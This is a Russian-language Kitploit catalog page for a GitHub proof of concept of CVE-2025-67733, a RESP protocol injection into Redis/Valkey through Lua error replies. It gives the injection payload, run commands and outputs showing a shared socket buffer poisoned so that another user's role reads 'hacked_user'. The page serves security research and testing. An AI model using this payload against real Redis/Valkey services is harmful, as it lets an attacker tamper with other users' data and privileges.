Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-67733 — PoC инъекции RESP Redis/Valkey (CVE-2025-67733) | Kitploit
Инструменты/GitHubGitHub/jylab/cve-2025-67733
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubjylab/cve-2025-67733

CVE-2025-67733

PoC инъекции RESP Redis/Valkey (CVE-2025-67733)

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инъекция протокола RESP PoC

Доказательство концепции, демонстрирующее уязвимость инъекции протокола RESP через сообщения об ошибках Lua-скриптов в Valkey/Redis.

Файлы

backend.py

Flask-бэкенд, имитирующий веб-приложение с общим подключением к Valkey (пул соединений).

Эндпоинты:

МетодЭндпоинтОписание
POST/api/user/roleУстановить роль пользователя
GET/api/user/roleПолучить роль пользователя
POST/api/processВыполнить Lua-скрипт

Использование:

root@kitploit:~
python backend.py <Valkey host> <Valkey port> [password]

# Examples
python backend.py 127.0.0.1 6379
python backend.py 127.0.0.1 6379 mypassword

attacker_client.py

Внедряет вредоносные данные RESP в буфер сокета через сообщение об ошибке Lua-скрипта.

Полезная нагрузка:

root@kitploit:~
error(redis.error_reply("INJECTED\r\n$11\r\nhacked_user"))

Использование:

root@kitploit:~
python attacker_client.py

victim_client.py

Легитимный клиент, который устанавливает и получает роли пользователей.

Использование:

root@kitploit:~
python victim_client.py set    # Set role to "normal_user"
python victim_client.py get    # Get current role

Демонстрация атаки

Предварительные требования

root@kitploit:~
pip install flask requests

Шаги

Терминал 1 - Запуск бэкенда:

root@kitploit:~
python backend.py 127.0.0.1 6379

Терминал 2 - Установка роли:

root@kitploit:~
python victim_client.py set
# Output: 'role':'normal_user' has been set.

python victim_client.py get
# Output: 'role':'normal_user'

Терминал 3 - Атака:

root@kitploit:~
python attacker_client.py
# Output: Socket poisoning successful

Терминал 2 - Получение роли (после атаки):

root@kitploit:~
python victim_client.py get
# Output: 'role':'hacked_user'

Схема атаки

root@kitploit:~
1. Victim sets role
   victim_client.py set --> backend --> Valkey
                                        SET user:user:role "normal_user"

2. Attacker injects payload
   attacker_client.py --> backend --> Valkey
                                      EVAL 'error(...)' 0

   Backend reads: "-ERR INJECTED\r\n"
   Buffer remains: "$11\r\nhacked_user"

3. Victim gets role
   victim_client.py get --> backend --> Valkey
                                        GET user:user:role

   Backend reads from buffer: "$11\r\nhacked_user"
   Victim receives: "hacked_user"
Скачать инструмент